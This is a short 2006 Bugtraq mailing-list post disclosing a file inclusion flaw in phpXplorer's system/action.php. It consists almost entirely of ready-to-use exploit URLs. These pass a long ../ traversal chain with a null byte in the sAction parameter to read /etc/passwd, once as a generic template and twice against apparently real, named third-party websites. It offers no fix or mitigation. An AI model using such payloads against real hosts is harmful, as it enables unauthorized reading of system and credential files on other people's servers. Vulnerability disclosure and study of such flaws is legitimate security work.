
Date: 18 Jan 2006 00:22:49 -0000
From: liz0@...mail.com
To: bugtraq@...urityfocus.com
Subject: phpXplorer file inclusion  biyosecurity.be


site:www.phpxplorer.org

------------------------------------------------
http://victim/folder/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00

-------------------------------------------------
example:
http://fta.lv/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00

http://lasersprint.com/phpXplorer/system/action.php?sShare=guest&sAction=../../../../../../../../../../../../etc/passwd%00

------------------------------------------------
Credit:Liz0ziM&Cyberlord biyosecurity.be


-------------------------------------------------
source:
http://www.blogcu.com/Liz0ziM/200529/





